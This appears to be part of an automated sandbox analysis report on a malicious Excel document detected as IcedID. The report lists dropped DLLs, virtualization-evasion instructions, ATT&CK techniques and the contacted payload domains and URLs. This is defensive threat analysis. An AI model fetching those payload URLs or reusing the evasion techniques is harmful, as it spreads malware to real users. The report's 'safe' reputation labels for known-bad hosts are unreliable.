          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XRAY.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XZIBIT.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fmlJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fmlJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XRAY.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XZIBIT.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00461E50 3_2_00461E50
          Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02091E50 4_2_02091E50
          Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00201E50 6_2_00201E50
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 0000000000461E71 second address: 0000000000461E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
          Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 0000000000461EAB second address: 0000000000461EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
          Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 0000000002091E71 second address: 0000000002091E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
          Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 0000000002091EAB second address: 0000000002091EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
          Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 0000000000201E71 second address: 0000000000201E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
          Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 0000000000201EAB second address: 0000000000201EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00462434 rdtsc 3_2_00462434
          Source: C:\Windows\System32\regsvr32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,3_2_004627BC
          Source: C:\Windows\System32\regsvr32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,4_2_020927BC
          Source: C:\Windows\System32\regsvr32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,6_2_002027BC
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fmlJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fmlJump to dropped file
          Source: regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpBinary or memory string: <a href="/rds/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>Amazon RDS on VMware</span> <cite>Automate on-premises database management</cite> </a>
          Source: regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpBinary or memory string: <a href="/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>VMware Cloud on AWS</span> <cite>Build a hybrid cloud without custom hardware</cite> </a>
          Source: regsvr32.exe, 00000006.00000003.2111365803.000000000309F000.00000004.00000001.sdmpBinary or memory string: <img src="//d1.awsstatic.com/Compute/VMware-Cloud-on-AWS_Icon_64_Squid.b126bc9cff89e6c44c4f5b9775521edd6743c2b8.png" alt="VMware-Cloud-on-AWS_Icon_64_Squid" title="VMware-Cloud-on-AWS_Icon_64_Squid" class="cq-dd-image" />
          Source: regsvr32.exe, 00000006.00000003.2111365803.000000000309F000.00000004.00000001.sdmpBinary or memory string: Migrate and extend VMware environments to the AWS Cloud
          Source: regsvr32.exe, 00000006.00000003.2111365803.000000000309F000.00000004.00000001.sdmpBinary or memory string: <a style="padding-left:20px; padding-bottom:0px; padding-right:45px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
          Source: regsvr32.exe, 00000006.00000003.2111365803.000000000309F000.00000004.00000001.sdmpBinary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-align-center lb-txt-none lb-h3 lb-title"> VMware Cloud on AWS</h3>
          Source: regsvr32.exe, 00000006.00000003.2111365803.000000000309F000.00000004.00000001.sdmpBinary or memory string: <a style="padding-left:30px; padding-bottom:0px; padding-right:30px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
          Source: regsvr32.exe, 00000006.00000003.2111365803.000000000309F000.00000004.00000001.sdmpBinary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-a
          Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00462434 rdtsc 3_2_00462434

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 104.21.37.209 80Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeDomain query: astrocycle.download
          Source: C:\Windows\System32\regsvr32.exeDomain query: aws.amazon.com
          Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 13.224.92.73 187Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 172.67.213.115 80Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_004622DC LookupAccountNameW,3_2_004622DC

          Stealing of Sensitive Information:

          barindex
          Yara detected IcedIDShow sources
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 00000004.00000002.2106938981.00000000002EE000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2176, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2708, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3048, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected IcedIDShow sources
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 00000004.00000002.2106938981.00000000002EE000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2176, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2708, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3048, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsExploitation for Client Execution43Path InterceptionProcess Injection11Masquerading121OS Credential DumpingSecurity Software Discovery211Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerAccount Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Regsvr321NTDSSystem Owner/User Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol124SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Network Configuration Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery22Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 444685 Sample: Purchaseconfirmation-137606.xlsm Startdate: 06/07/2021 Architecture: WINDOWS Score: 100 47 Found malware configuration 2->47 49 Document exploit detected (drops PE files) 2->49 51 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->51 53 6 other signatures 2->53 6 EXCEL.EXE 53 28 2->6         started        process3 dnsIp4 27 uppercilio.fun 104.21.55.83, 49167, 80 CLOUDFLARENETUS United States 6->27 29 voopeople.fun 172.67.194.117, 49166, 80 CLOUDFLARENETUS United States 6->29 31 thousandsyears.download 172.67.198.51, 49165, 80 CLOUDFLARENETUS United States 6->31 19 C:\Users\user\XZIBIT.dll, PE32+ 6->19 dropped 21 C:\Users\user\XTOWN.dll, PE32+ 6->21 dropped 23 C:\Users\user\XRAY.dll, PE32+ 6->23 dropped 25 3 other malicious files 6->25 dropped 55 Document exploit detected (creates forbidden files) 6->55 57 Document exploit detected (UrlDownloadToFile) 6->57 11 regsvr32.exe 4 6->11         started        15 regsvr32.exe 6->15         started        17 regsvr32.exe 6->17         started        file5 signatures6 process7 dnsIp8 33 astrocycle.download 172.67.213.115, 49169, 80 CLOUDFLARENETUS United States 11->33 35 dr49lng3n1n2s.cloudfront.net 13.224.92.73, 443, 49168, 49170 AMAZON-02US United States 11->35 43 2 other IPs or domains 11->43 59 System process connects to network (likely due to code injection or exploit) 11->59 61 Contains functionality to detect hardware virtualization (CPUID execution measurement) 11->61 63 Tries to detect virtualization through RDTSC time measurements 11->63 45 2 other IPs or domains 15->45 37 104.21.37.209, 49171, 49173, 80 CLOUDFLARENETUS United States 17->37 39 tp.8e49140c2-frontier.amazon.com 17->39 41 aws.amazon.com 17->41 signatures9

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
          http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
          http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
          http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
          https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
          https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
          https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
          http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
          http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
          http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
          http://voopeople.fun/div/44376,8555986111.jpg0%Avira URL Cloudsafe
          http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
          http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
          http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
          http://astrocycle.download/0%Avira URL Cloudsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe
          http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
          http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
          http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
          http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
          http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
          http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
          http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
          http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
          http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
          http://uppercilio.fun/div/44376,8555986111.jpg0%Avira URL Cloudsafe
          http://o.ss2.us/00%URL Reputationsafe
          http://o.ss2.us/00%URL Reputationsafe
          http://o.ss2.us/00%URL Reputationsafe
          http://thousandsyears.download/div/44376,8555986111.jpg0%Avira URL Cloudsafe
          http://ocsp.entrust.net030%URL Reputationsafe
          http://ocsp.entrust.net030%URL Reputationsafe
          http://ocsp.entrust.net030%URL Reputationsafe
          http://crt.rootg2.amazontrust.com/rootg2.cer0=0%URL Reputationsafe
          http://crt.rootg2.amazontrust.com/rootg2.cer0=0%URL Reputationsafe
          http://crt.rootg2.amazontrust.com/rootg2.cer0=0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://ocsp.entrust.net0D0%URL Reputationsafe
          http://ocsp.entrust.net0D0%URL Reputationsafe
          http://ocsp.entrust.net0D0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          uppercilio.fun
          		104.21.55.83
          		truefalse
            		unknown
            thousandsyears.download
            		172.67.198.51
            		truefalse
              		unknown
              voopeople.fun
              		172.67.194.117
              		truefalse
                		unknown
                astrocycle.download
                		172.67.213.115
                		truetrue
                  		unknown
                  dr49lng3n1n2s.cloudfront.net
                  		13.224.92.73
                  		truefalse
                    		high
                    aws.amazon.com
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://voopeople.fun/div/44376,8555986111.jpgfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://astrocycle.download/true
                      • Avira URL Cloud: safe
                      		unknown
                      http://uppercilio.fun/div/44376,8555986111.jpgfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://thousandsyears.download/div/44376,8555986111.jpgfalse
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://twitter.com/awscloudregsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                        		high
                        https://a0.awsstatic.com/libra/1.0.385/directoriesregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                          		high
                          https://aws.amazon.com/terms/?nc1=f_prregsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                            		high
                            https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gifregsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                              		high
                              https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.htmlregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                		high
                                https://aws.amazon.com/cn/regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                  		high
                                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://a0.awsstatic.com/libra-css/imagesregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                    		high
                                    https://a0.awsstatic.com/libra/1.0.385/librastandardlibregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                      		high
                                      https://a0.awsstatic.com/psf/nullregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                        		high
                                        https://aws.amazon.com/ar/regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                          		high
                                          https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-homregsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://pages.awscloud.com/zillow-case-study?hp=tile&amp;story=zllwregsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                            		high
                                            https://pages.awscloud.com/communication-preferences?trk=homepageregsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                              		high
                                              http://ocsp.rootg2.amazontrust.com08regsvr32.exe, 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://aws.amazon.com/cn/?nc1=h_lsregsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                		high
                                                https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=defaultregsvr32.exe, 00000003.00000002.2103080337.0000000003680000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://aws.amazon.com/ru/regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://aws.amazon.com/tw/?nc1=h_lsregsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowserregsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://i18n-string.us-west-2.prod.pricing.aws.a2z.comregsvr32.exe, 00000003.00000003.2095564891.000000000366F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://aws.amazon.com/ko/regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://aws.amazon.com/ru/?nc1=h_lsregsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000002.2116356167.00000000030C5000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://a0.awsstatic.com/libra-css/images/site/fav/favicon.icoregsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://aws.amazon.com/es/regsvr32.exe, 00000003.00000003.2095531751.00000000036B2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2108123796.0000000002A64000.00000004.00000001.sdmp, regsvr32.exe, 00000006.00000003.2111193398.00000000030E9000.00000004.00000001.sdmpfalse
                                                                  		high
